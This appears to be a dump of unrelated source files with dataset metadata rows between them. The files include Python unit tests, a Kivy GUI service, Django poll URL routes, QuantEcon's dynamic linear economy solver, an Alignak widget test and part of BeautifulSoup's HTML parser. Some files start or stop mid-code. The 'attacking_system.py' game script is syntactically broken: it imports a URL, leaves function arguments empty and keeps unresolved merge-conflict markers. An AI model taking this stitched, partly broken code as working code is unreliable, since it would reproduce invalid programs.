csv_file = 'test_bin_table_flags.csv'
self._create_fits_bintable_with_flags(fits_file)
desc.pserv.create_csv_file_from_fits(fits_file, hdunum, csv_file)
with open(csv_file) as csv_data:
self.assertEqual('FLAGS1,FLAGS2,id\n', csv_data.readline())
self.assertEqual('1,0,0\n', csv_data.readline())
self.assertEqual('%d,0,1\n' % 2**63, csv_data.readline())
self.assertEqual('0,1,2\n', csv_data.readline())
os.remove(fits_file)
os.remove(csv_file)
def test_get_pandas_data_frame(self):
"""
Test get_pandas_data_frame which retrieves a df with the table
data given a select query.
"""
self._fill_test_table()
# Test getting all of the columns
query = "select * from %s" % self.test_table
df = self.connection.get_pandas_data_frame(query)
self.assertEqual(df.shape, (4, 5))
self.assertEqual(df['keywd'].values[0], 'a')
self.assertAlmostEqual(df['double_value'].values[2], np.pi, places=5)
# Test getting a selection of columns.
query = "select keywd, double_value from %s" % self.test_table
df = self.connection.get_pandas_data_frame(query)
self.assertEqual(df.shape, (4, 2))
self.assertEqual(df['keywd'].values[0], 'a')
self.assertAlmostEqual(df['double_value'].values[2], np.pi, places=5)
class BinTableDataTestCase(unittest.TestCase):
"TestCase class for BinTableData class."
def setUp(self):
pass
def tearDown(self):
pass
def test_pack_flags(self):
"Test function to pack an array of bools into unsigned ints."
nflags = 142
nbits = 64
data = [np.array([True] + (nflags-1)*[False]),
np.array(nbits*[False] + [True] + (nflags-nbits-1)*[False]),
np.array(2*nbits*[False] + [True] + (nflags-2*nbits-1)*[False]),
np.array((nbits-1)*[False] + [True] + (nflags-nbits)*[False]),
np.array((2*nbits-1)*[False] + [True] + (nflags-2*nbits)*[False]),
np.array((nflags-1)*[False] + [True])]
expected = [(1, 0, 0), (0, 1, 0), (0, 0, 1),
(2**(nbits-1), 0, 0), (0, 2**(nbits-1), 0),
(0, 0, 2**(nflags-2*nbits-1))]
for flags, values in zip(data, expected):
packed = desc.pserv.BinTableData.pack_flags(flags, nbits=nbits)
for bigint, value in zip(packed, values):
self.assertEqual(bigint, value)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -7,623,598,262,227,999,000 | 42.214953 | 85 | 0.527628 | false |
vaizguy/cryptikchaos | src/cryptikchaos/core/gui/service.py | 1 | 5439 | '''
Created on Oct 8, 2013
This file is part of CryptikChaos.
CryptikChaos is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CryptikChaos is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CryptikChaos. If not, see <http://www.gnu.org/licenses/>.
@author: vaizguy
'''
__author__ = "Arun Vaidya"
__version__ = "0.6.1"
from kivy.app import App
from kivy.resources import resource_add_path
from kivy.logger import Logger
from kivy.core.window import Window
from kivy.clock import Clock
from cryptikchaos.core.env.configuration import constants
try:
from cryptikchaos.libs.garden.navigationdrawer \
import NavigationDrawer
except ImportError:
from kivy.garden.navigationdrawer import NavigationDrawer
else:
pass
from cryptikchaos.core.gui.mainpanel import MainPanel
from cryptikchaos.core.gui.sidepanel import SidePanel
# Add kivy resource paths
resource_add_path(constants.KIVY_RESOURCE_PATH_1)
resource_add_path(constants.KIVY_RESOURCE_PATH_2)
class GUIService(App):
"Graphical user interface service."
# Init attributes
core_services = None
def __init__(self, handleinput_cmd_hook, getcommands_cmd_hook, **kwargs):
# Init App
super(GUIService, self).__init__(**kwargs)
# Disable default kivy settings
self.use_kivy_settings = False
# Main drawer
self.drawer = NavigationDrawer()
# Set up Main panel
self.main_panel = MainPanel(
# drawer obj
drawer=self.drawer,
# Console splash greeting
greeting=constants.GUI_WELCOME_MSG,
)
# Set up Side pane
self.side_panel = SidePanel(
# drawer obj
drawer=self.drawer,
# screen manager obj
main_panel=self.main_panel
)
        # Append text to console hook
self.inputtext_gui_hook = self.main_panel.inputtext_gui_hook
# Get App GUI Width
self.getmaxwidth_gui_hook = self.main_panel.getmaxwidth_gui_hook
# Clear display hook
self.cleardisplay_gui_hook = self.main_panel.cleardisplay_gui_hook
# Update progress bar
self.cmdprog_gui_hook = self.main_panel.cmdprog_gui_hook
# Register CMD hooks
self.main_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
self.main_panel.register_getcommands_cmd_hook(
getcommands_cmd_hook)
self.side_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
def build(self):
"Build the kivy App."
# Set title
self.title = "CryptikChaos"
# Add main and side pane
self.drawer.add_widget(self.side_panel)
self.drawer.add_widget(self.main_panel)
# Set animation type
self.drawer.anim_type = 'slide_above_anim'
# Bind Keyboard hook
self.bind(on_start=self.post_build_init)
return self.drawer
def on_start(self):
'''Event handler for the on_start event, which is fired after
initialization (after build() has been called), and before the
application is being run.
'''
Logger.debug("GUI: Cryptikchaos Client started.")
# Print criptikchaos banner
Clock.schedule_once(self.print_logo, 1)
def on_stop(self):
'''Event handler for the on_stop event, which is fired when the
application has finished running (e.g. the window is about to be
closed).
'''
Logger.debug("GUI: Stopped Cryptikchaos Client.")
def on_pause(self):
return True
def on_resume(self):
pass
def print_logo(self, *args):
"Print the criptikchaos logo."
if constants.GUI_LOGO:
# Print logo through log
Logger.info('GUI: \n{}'.format(constants.GUI_LOGO))
return args
def post_build_init(self, *args):
if constants.PLATFORM_ANDROID:
import android
android.map_key(android.KEYCODE_BACK, 1001)
win = Window
win.bind(on_keyboard=self.my_key_handler)
def toggle_drawer_state(self):
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
else:
self.drawer.anim_to_state("open")
def my_key_handler(self, window, keycode1, keycode2, text, modifiers):
#Logger.debug("H/W Keypress: {}".format(keycode1))
if keycode1 in [27, 1001]:
# Go to console screen or close app
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
elif self.main_panel.is_console_focused():
self.stop()
else:
self.main_panel.goto_console_screen()
return True
elif keycode1 == 319:
# Open navbar with menu key
self.toggle_drawer_state()
return True
else:
return False
| gpl-3.0 | 6,267,618,879,123,569,000 | 28.085561 | 77 | 0.627689 | false |
silenius/amnesia | amnesia/modules/folder/orders.py | 1 | 1754 | # -*- coding: utf-8 -*-
from amnesia.modules.content import Content
from amnesia.modules.content_type import ContentType
from amnesia.modules.event import Event
from amnesia.modules.account import Account
#from amnesia.modules.country import Country
from amnesia.order import EntityOrder
from amnesia.order import Path
def includeme(config):
config.include('amnesia.modules.content.mapper')
config.include('amnesia.modules.account.mapper')
config.include('amnesia.modules.event.mapper')
config.registry.settings['amnesia:orders'] = {
'title': EntityOrder(Content, 'title', 'asc', doc='title'),
'weight': EntityOrder(Content, 'weight', 'desc', doc='default'),
'update': EntityOrder(
Content, 'last_update', 'desc', doc='last update'
),
'added': EntityOrder(Content, 'added', 'desc', doc='added date'),
'type': EntityOrder(
ContentType, 'name', 'asc', path=[Path(Content, 'type')],
doc='content type'
),
'owner': EntityOrder(Account, 'login', 'asc', path=[Path(Content,
'owner')],
doc='owner'),
'starts': EntityOrder(Event, 'starts', 'desc', doc='event starts'),
'ends': EntityOrder(Event, 'ends', 'desc', doc='event ends'),
# 'country' : EntityOrder(Country, 'name', 'asc', path=[Path(Event,
# 'country')],
# doc='event country'),
# 'major' : EntityOrder(MimeMajor, 'name', 'asc',
# path=[Path(File, 'mime'), Path(Mime, 'major')],
# doc='mime')
}
| bsd-2-clause | -7,095,688,458,044,918,000 | 41.780488 | 80 | 0.54618 | false |
theneurasthenicrat/whale4 | polls/urls.py | 1 | 2490 | # -*- coding: utf-8 -*-
from django.conf.urls import url
from django.views.generic import TemplateView
from polls import views
uuid4="[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}"
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^redirectPage/$', views.redirect_page, name='redirectPage'),
url(r'^choosePollType$', views.choose_poll_type, name='choosePollType'),
url(r'^candidateCreate/('+uuid4+')/$', views.candidate_create, name='candidateCreate'),
url(r'^dateCandidateCreate/('+uuid4+')/$', views.date_candidate_create, name='dateCandidateCreate'),
url(r'^manageCandidate/('+uuid4+')/$', views.manage_candidate, name='manageCandidate'),
url(r'^updatePoll/(' + uuid4 +')/$', views.update_voting_poll, name='updatePoll'),
url(r'^deleteCandidate/('+uuid4+')/([^/]+)/$', views.delete_candidate, name='deleteCandidate'),
url(r'^updateVote/('+uuid4+')/([^/]+)/$', views.update_vote, name='updateVote'),
url(r'^deleteVote/('+uuid4+')/([^/]+)/$', views.delete_vote, name='deleteVote'),
url(r'^deleteAnonymous/('+uuid4+')/([^/]+)/$', views.delete_anonymous, name='deleteAnonymous'),
url(r'^newPoll/(?P<choice>[^/]+)/$', views.new_poll, name='newPoll'),
url(r'^viewPoll/('+uuid4+')', views.view_poll, name='viewPoll'),
url(r'^status/('+uuid4+')', views.status, name='status'),
url(r'^viewPollSecret/('+uuid4+')/([^/]+)/$', views.view_poll_secret, name='viewPollSecret'),
url(r'^vote/('+uuid4+')', views.vote, name='vote'),
url(r'^invitation/('+uuid4+')/$', views.invitation, name='invitation'),
url(r'^admin/('+uuid4+')/$', views.admin_poll, name='admin'),
url(r'^resetPoll/('+uuid4+')/$', views.reset_poll, name='resetPoll'),
url(r'^advancedParameters/('+uuid4+')/$', views.advanced_parameters, name='advancedParameters'),
url(r'^deleteVotingPoll/(' + uuid4 +')/$', views.delete_poll, name='deleteVotingPoll'),
url(r'^certificate/('+uuid4+')', views.certificate, name='certificate'),
url(r'^results/('+uuid4+')', views.result_all, name='results'),
url(r'^viewResult/('+uuid4+')/([^/]+)/$', views.result_view, name='viewResult'),
url(r'^scores/('+uuid4+')/([^/]+)/$', views.result_scores, name='scores'),
url(r'^data/('+uuid4+')', views.data_page, name='data'),
url(r'^allData$', TemplateView.as_view(template_name='polls/all_data.html'), name='allData'),
url(r'^about$', TemplateView.as_view(template_name='polls/about.html'), name='about'),
]
| gpl-3.0 | -2,989,620,190,023,986,000 | 64.526316 | 104 | 0.627711 | false |
oyamad/QuantEcon.py | quantecon/dle.py | 1 | 14017 | """
Provides a class called DLE to convert and solve dynamic linear economics
(as set out in Hansen & Sargent (2013)) as LQ problems.
"""
import numpy as np
from .lqcontrol import LQ
from .matrix_eqn import solve_discrete_lyapunov
from .rank_nullspace import nullspace
class DLE(object):
r"""
This class is for analyzing dynamic linear economies, as set out in Hansen & Sargent (2013).
The planner's problem is to choose \{c_t, s_t, i_t, h_t, k_t, g_t\}_{t=0}^\infty to maximize
\max -(1/2) \mathbb{E} \sum_{t=0}^{\infty} \beta^t [(s_t - b_t).(s_t-b_t) + g_t.g_t]
subject to the linear constraints
\Phi_c c_t + \Phi_g g_t + \Phi_i i_t = \Gamma k_{t-1} + d_t
k_t = \Delta_k k_{t-1} + \Theta_k i_t
h_t = \Delta_h h_{t-1} + \Theta_h c_t
s_t = \Lambda h_{t-1} + \Pi c_t
and
z_{t+1} = A_{22} z_t + C_2 w_{t+1}
b_t = U_b z_t
d_t = U_d z_t
where h_{-1}, k_{-1}, and z_0 are given as initial conditions.
Section 5.5 of HS2013 describes how to map these matrices into those of
a LQ problem.
HS2013 sort the matrices defining the problem into three groups:
Information: A_{22}, C_2, U_b , and U_d characterize the motion of information
sets and of taste and technology shocks
Technology: \Phi_c, \Phi_g, \Phi_i, \Gamma, \Delta_k, and \Theta_k determine the
technology for producing consumption goods
Preferences: \Delta_h, \Theta_h, \Lambda, and \Pi determine the technology for
producing consumption services from consumer goods. A scalar discount factor \beta
determines the preference ordering over consumption services.
Parameters
----------
Information : tuple
Information is a tuple containing the matrices A_{22}, C_2, U_b, and U_d
Technology : tuple
Technology is a tuple containing the matrices \Phi_c, \Phi_g, \Phi_i, \Gamma,
\Delta_k, and \Theta_k
Preferences : tuple
Preferences is a tuple containing the matrices \Delta_h, \Theta_h, \Lambda,
\Pi, and the scalar \beta
"""
def __init__(self, information, technology, preferences):
# === Unpack the tuples which define information, technology and preferences === #
self.a22, self.c2, self.ub, self.ud = information
self.phic, self.phig, self.phii, self.gamma, self.deltak, self.thetak = technology
self.beta, self.llambda, self.pih, self.deltah, self.thetah = preferences
# === Computation of the dimension of the structural parameter matrices === #
self.nb, self.nh = self.llambda.shape
self.nd, self.nc = self.phic.shape
self.nz, self.nw = self.c2.shape
junk, self.ng = self.phig.shape
self.nk, self.ni = self.thetak.shape
# === Creation of various useful matrices === #
uc = np.hstack((np.eye(self.nc), np.zeros((self.nc, self.ng))))
ug = np.hstack((np.zeros((self.ng, self.nc)), np.eye(self.ng)))
phiin = np.linalg.inv(np.hstack((self.phic, self.phig)))
phiinc = uc.dot(phiin)
phiing = ug.dot(phiin)
b11 = - self.thetah.dot(phiinc).dot(self.phii)
a1 = self.thetah.dot(phiinc).dot(self.gamma)
a12 = np.vstack((self.thetah.dot(phiinc).dot(
self.ud), np.zeros((self.nk, self.nz))))
# === Creation of the A Matrix for the state transition of the LQ problem === #
a11 = np.vstack((np.hstack((self.deltah, a1)), np.hstack(
(np.zeros((self.nk, self.nh)), self.deltak))))
self.A = np.vstack((np.hstack((a11, a12)), np.hstack(
(np.zeros((self.nz, self.nk + self.nh)), self.a22))))
# === Creation of the B Matrix for the state transition of the LQ problem === #
b1 = np.vstack((b11, self.thetak))
self.B = np.vstack((b1, np.zeros((self.nz, self.ni))))
# === Creation of the C Matrix for the state transition of the LQ problem === #
self.C = np.vstack((np.zeros((self.nk + self.nh, self.nw)), self.c2))
# === Define R,W and Q for the payoff function of the LQ problem === #
self.H = np.hstack((self.llambda, self.pih.dot(uc).dot(phiin).dot(self.gamma), self.pih.dot(
uc).dot(phiin).dot(self.ud) - self.ub, -self.pih.dot(uc).dot(phiin).dot(self.phii)))
self.G = ug.dot(phiin).dot(
np.hstack((np.zeros((self.nd, self.nh)), self.gamma, self.ud, -self.phii)))
self.S = (self.G.T.dot(self.G) + self.H.T.dot(self.H)) / 2
self.nx = self.nh + self.nk + self.nz
self.n = self.ni + self.nh + self.nk + self.nz
self.R = self.S[0:self.nx, 0:self.nx]
self.W = self.S[self.nx:self.n, 0:self.nx]
self.Q = self.S[self.nx:self.n, self.nx:self.n]
# === Use quantecon's LQ code to solve our LQ problem === #
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
self.P, self.F, self.d = lq.stationary_values()
# === Construct output matrices for our economy using the solution to the LQ problem === #
self.A0 = self.A - self.B.dot(self.F)
self.Sh = self.A0[0:self.nh, 0:self.nx]
self.Sk = self.A0[self.nh:self.nh + self.nk, 0:self.nx]
self.Sk1 = np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))
self.Si = -self.F
self.Sd = np.hstack((np.zeros((self.nd, self.nh + self.nk)), self.ud))
self.Sb = np.hstack((np.zeros((self.nb, self.nh + self.nk)), self.ub))
self.Sc = uc.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Sg = ug.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Ss = self.llambda.dot(np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk + self.nz))))) + self.pih.dot(self.Sc)
# === Calculate eigenvalues of A0 === #
self.A110 = self.A0[0:self.nh + self.nk, 0:self.nh + self.nk]
self.endo = np.linalg.eigvals(self.A110)
self.exo = np.linalg.eigvals(self.a22)
# === Construct matrices for Lagrange Multipliers === #
self.Mk = -2 * np.asscalar(self.beta) * (np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))).dot(self.P).dot(self.A0)
self.Mh = -2 * np.asscalar(self.beta) * (np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk)), np.zeros((self.nh, self.nz))))).dot(self.P).dot(self.A0)
self.Ms = -(self.Sb - self.Ss)
self.Md = -(np.linalg.inv(np.vstack((self.phic.T, self.phig.T))).dot(
np.vstack((self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms), -self.Sg))))
self.Mc = -(self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms))
self.Mi = -(self.thetak.T.dot(self.Mk))
def compute_steadystate(self, nnc=2):
"""
Computes the non-stochastic steady-state of the economy.
Parameters
----------
nnc : array_like(float)
nnc is the location of the constant in the state vector x_t
"""
zx = np.eye(self.A0.shape[0])-self.A0
self.zz = nullspace(zx)
self.zz /= self.zz[nnc]
self.css = self.Sc.dot(self.zz)
self.sss = self.Ss.dot(self.zz)
self.iss = self.Si.dot(self.zz)
self.dss = self.Sd.dot(self.zz)
self.bss = self.Sb.dot(self.zz)
self.kss = self.Sk.dot(self.zz)
self.hss = self.Sh.dot(self.zz)
def compute_sequence(self, x0, ts_length=None, Pay=None):
"""
Simulate quantities and prices for the economy
Parameters
----------
x0 : array_like(float)
The initial state
ts_length : scalar(int)
Length of the simulation
Pay : array_like(float)
Vector to price an asset whose payout is Pay*xt
"""
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
xp, up, wp = lq.compute_sequence(x0, ts_length)
self.h = self.Sh.dot(xp)
self.k = self.Sk.dot(xp)
self.i = self.Si.dot(xp)
self.b = self.Sb.dot(xp)
self.d = self.Sd.dot(xp)
self.c = self.Sc.dot(xp)
self.g = self.Sg.dot(xp)
self.s = self.Ss.dot(xp)
# === Value of J-period risk-free bonds === #
# === See p.145: Equation (7.11.2) === #
e1 = np.zeros((1, self.nc))
e1[0, 0] = 1
self.R1_Price = np.empty((ts_length + 1, 1))
self.R2_Price = np.empty((ts_length + 1, 1))
self.R5_Price = np.empty((ts_length + 1, 1))
for i in range(ts_length + 1):
self.R1_Price[i, 0] = self.beta * e1.dot(self.Mc).dot(np.linalg.matrix_power(
self.A0, 1)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R2_Price[i, 0] = self.beta**2 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 2)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R5_Price[i, 0] = self.beta**5 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 5)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
# === Gross rates of return on 1-period risk-free bonds === #
self.R1_Gross = 1 / self.R1_Price
# === Net rates of return on J-period risk-free bonds === #
# === See p.148: log of gross rate of return, divided by j === #
self.R1_Net = np.log(1 / self.R1_Price) / 1
self.R2_Net = np.log(1 / self.R2_Price) / 2
self.R5_Net = np.log(1 / self.R5_Price) / 5
# === Value of asset whose payout vector is Pay*xt === #
# See p.145: Equation (7.11.1)
if isinstance(Pay, np.ndarray) == True:
self.Za = Pay.T.dot(self.Mc)
self.Q = solve_discrete_lyapunov(
self.A0.T * self.beta**0.5, self.Za)
self.q = self.beta / (1 - self.beta) * \
np.trace(self.C.T.dot(self.Q).dot(self.C))
self.Pay_Price = np.empty((ts_length + 1, 1))
self.Pay_Gross = np.empty((ts_length + 1, 1))
self.Pay_Gross[0, 0] = np.nan
for i in range(ts_length + 1):
self.Pay_Price[i, 0] = (xp[:, i].T.dot(self.Q).dot(
xp[:, i]) + self.q) / e1.dot(self.Mc).dot(xp[:, i])
for i in range(ts_length):
self.Pay_Gross[i + 1, 0] = self.Pay_Price[i + 1,
0] / (self.Pay_Price[i, 0] - Pay.dot(xp[:, i]))
return
def irf(self, ts_length=100, shock=None):
"""
Create Impulse Response Functions
Parameters
----------
ts_length : scalar(int)
Number of periods to calculate IRF
Shock : array_like(float)
Vector of shocks to calculate IRF to. Default is first element of w
"""
if type(shock) != np.ndarray:
# Default is to select first element of w
shock = np.vstack((np.ones((1, 1)), np.zeros((self.nw - 1, 1))))
self.c_irf = np.empty((ts_length, self.nc))
self.s_irf = np.empty((ts_length, self.nb))
self.i_irf = np.empty((ts_length, self.ni))
self.k_irf = np.empty((ts_length, self.nk))
self.h_irf = np.empty((ts_length, self.nh))
self.g_irf = np.empty((ts_length, self.ng))
self.d_irf = np.empty((ts_length, self.nd))
self.b_irf = np.empty((ts_length, self.nb))
for i in range(ts_length):
self.c_irf[i, :] = self.Sc.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.s_irf[i, :] = self.Ss.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.i_irf[i, :] = self.Si.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.k_irf[i, :] = self.Sk.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.h_irf[i, :] = self.Sh.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.g_irf[i, :] = self.Sg.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.d_irf[i, :] = self.Sd.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.b_irf[i, :] = self.Sb.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
return
def canonical(self):
"""
Compute canonical preference representation
Uses auxiliary problem of 9.4.2, with the preference shock process reintroduced
Calculates pihat, llambdahat and ubhat for the equivalent canonical household technology
"""
Ac1 = np.hstack((self.deltah, np.zeros((self.nh, self.nz))))
Ac2 = np.hstack((np.zeros((self.nz, self.nh)), self.a22))
Ac = np.vstack((Ac1, Ac2))
Bc = np.vstack((self.thetah, np.zeros((self.nz, self.nc))))
Cc = np.vstack((np.zeros((self.nh, self.nw)), self.c2))
Rc1 = np.hstack((self.llambda.T.dot(self.llambda), -
self.llambda.T.dot(self.ub)))
Rc2 = np.hstack((-self.ub.T.dot(self.llambda), self.ub.T.dot(self.ub)))
Rc = np.vstack((Rc1, Rc2))
Qc = self.pih.T.dot(self.pih)
Nc = np.hstack(
(self.pih.T.dot(self.llambda), -self.pih.T.dot(self.ub)))
lq_aux = LQ(Qc, Rc, Ac, Bc, N=Nc, beta=self.beta)
P1, F1, d1 = lq_aux.stationary_values()
self.F_b = F1[:, 0:self.nh]
self.F_f = F1[:, self.nh:]
self.pihat = np.linalg.cholesky(self.pih.T.dot(
self.pih) + self.beta.dot(self.thetah.T).dot(P1[0:self.nh, 0:self.nh]).dot(self.thetah)).T
self.llambdahat = self.pihat.dot(self.F_b)
self.ubhat = - self.pihat.dot(self.F_f)
return
| bsd-3-clause | 668,505,785,645,585,400 | 41.475758 | 105 | 0.552615 | false |
Alignak-monitoring-contrib/alignak-app | test/test_service_widget.py | 1 | 5477 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2018:
# Matthieu Estrada, [email protected]
#
# This file is part of (AlignakApp).
#
# (AlignakApp) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (AlignakApp) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (AlignakApp). If not, see <http://www.gnu.org/licenses/>.
import sys
import unittest2
from PyQt5.Qt import QApplication, QLabel, QPushButton, QWidget
from alignak_app.backend.datamanager import data_manager
from alignak_app.items.host import Host
from alignak_app.items.service import Service
from alignak_app.items.user import User
from alignak_app.utils.config import settings
from alignak_app.locales.locales import init_localization
from alignak_app.qobjects.service.service import ServiceDataQWidget
settings.init_config()
init_localization()
app = QApplication(sys.argv)
user = User()
user.create('_id', {'name': 'name'}, 'name')
data_manager.database['user'] = user
class TestServiceDataQWidget(unittest2.TestCase):
"""
This file test methods of ServiceDataQWidget class object
"""
# Host data test
host_list = []
for i in range(0, 10):
host = Host()
host.create(
'_id%d' % i,
{
'name': 'host%d' % i,
'_id': '_id%d' % i,
'passive_checks_enabled': False,
'active_checks_enabled': True
},
'host%d' % i
)
host_list.append(host)
# Service data test
service_list = []
for i in range(0, 10):
service = Service()
service.create(
'_id%d' % i,
{
'name': 'service%d' % i,
'alias': 'service %d' % i,
'_id': '_id%d' % i,
'host': '_id%d' % i,
'ls_acknowledged': False,
'ls_downtimed': False,
'ls_state': 'OK',
'aggregation': 'disk',
'ls_last_check': 123456789,
'ls_output': 'All is ok',
'business_impact': 2,
'passive_checks_enabled': False,
'active_checks_enabled': True
},
'service%d' % i
)
service_list.append(service)
service = Service()
service.create(
'other_id2%d' % i,
{
'name': 'other_service2%d' % i,
'_id': 'other_id2%d' % i,
'host': '_id%d' % i,
'ls_acknowledged': False,
'ls_downtimed': False,
'ls_state': 'CRITICAL',
'aggregation': 'CPU',
'passive_checks_enabled': False,
'active_checks_enabled': True
},
'other_service%d' % i
)
service_list.append(service)
@classmethod
def setUpClass(cls):
"""Create QApplication"""
try:
cls.app = QApplication(sys.argv)
except:
pass
def test_initialize(self):
"""Initialize ServiceDataQWidget"""
under_test = ServiceDataQWidget()
self.assertIsNone(under_test.service_item)
self.assertIsNotNone(under_test.labels)
for label in under_test.labels:
self.assertIsInstance(under_test.labels[label], QLabel)
self.assertIsNotNone(under_test.buttons)
for button in under_test.buttons:
self.assertIsInstance(under_test.buttons[button], QPushButton)
under_test.initialize()
self.assertIsNone(under_test.service_item)
self.assertIsNotNone(under_test.labels)
for label in under_test.labels:
self.assertIsInstance(under_test.labels[label], QLabel)
self.assertIsNotNone(under_test.buttons)
for button in under_test.buttons:
self.assertIsInstance(under_test.buttons[button], QPushButton)
# Assert QWidget is Hidden for first display
self.assertTrue(under_test.isHidden())
def test_get_icon_widget(self):
"""Get Icon QWidget ServiceDataQWidget"""
service_data_widget_test = ServiceDataQWidget()
under_test = service_data_widget_test.get_service_icon_widget()
self.assertIsInstance(under_test, QWidget)
def test_update_widget(self):
"""Update ServiceData QWidget"""
under_test = ServiceDataQWidget()
under_test.initialize()
old_labels = {}
# Store QLabel.text() = ''
for label in under_test.labels:
old_labels[label] = under_test.labels[label]
data_manager.database['user'].data['can_submit_commands'] = True
data_manager.update_database('service', self.service_list)
under_test.update_widget(self.service_list[0])
new_labels = under_test.labels
# Assert labels have been filled by update
for label in old_labels:
self.assertNotEqual(new_labels[label].text(), old_labels[label])
| agpl-3.0 | -1,748,505,908,918,247,700 | 29.943503 | 77 | 0.590834 | false |
TheMuffinMan5930/NarutoBattle | attacking_system.py | 1 | 1259 | import gspread
import "https://github.com/TheMuffinMan5930/NarutoBattle/blob/master/Chat.py"
Jitsu_Player = sh.worksheet(Player_Name + "- Jitsus")
i = 1
while True:
exec("Jit" + i + " = worksheet.acell(" + i.string.ascii_uppercase.index(i - 1).value + "2)")
i += 1
confirmation_of_jitsus = input("Is it correct that you have {}, {}, {}, {}, {}, {}, {} as your ttjitsus? Y/N".format(Jit1, Jit2, Jit3, Jit4, Jit5, Jit6, Jit7))
if confirmation_of_jitsus == Y
worksheet.update.cell("Ready")
elif confirmation_of_jitsus == N
QuitGame() # Def this aswell
except:
print("Error")
# turn progressing code here
# this is just the code I CAN do.
class Attack(object)
def __init__(self)
self.coordinates_of_Jitsu = wsJitsus.cell( : , :)
self.range = wsJitsus.cell( , ,)#blah, Blah plus syntax check for 19 - 22ish
self.damage = wsJitsus.cell( , ,)
self.chakra_cost = wsJitsus.cell( , ,) #other attributes
self.aim = wsJitsus.cell( , ,)
self.Jitsu_Name = wsJitsus.cell( , ,)
self.purchase_cost = wsJitsus.cell( , ,)
self.Jitsu_Rank = wsJitsus.cell( , ,)
<<<<<<< HEAD:Attacking System.py
def __str__(self)
return("Your Jitsu has {}d".format(Jitsu))
=======
>>>>>>> 7723f44702a9a1e3e4c3431c136d1ad136bda8c4:attacking_system.py
| mit | -8,263,799,134,107,539,000 | 37.030303 | 159 | 0.661355 | false |
chimkentec/KodiMODo_rep | script.module.xbmcup/lib/xbmcup/bsoup4/builder/_htmlparser.py | 1 | 8347 | """Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
from HTMLParser import (
HTMLParser,
HTMLParseError,
)
import sys
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = (
major > 3
or (major == 3 and minor > 2)
or (major == 3 and minor == 2 and release >= 3))
from ..element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from ..dammit import EntitySubstitution, UnicodeDammit
from ..builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
self.soup.handle_starttag(name, None, None, dict(attrs))
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed.
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
else:
real_name = int(name)
try:
data = unichr(real_name)
except (ValueError, OverflowError), e:
data = u"\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
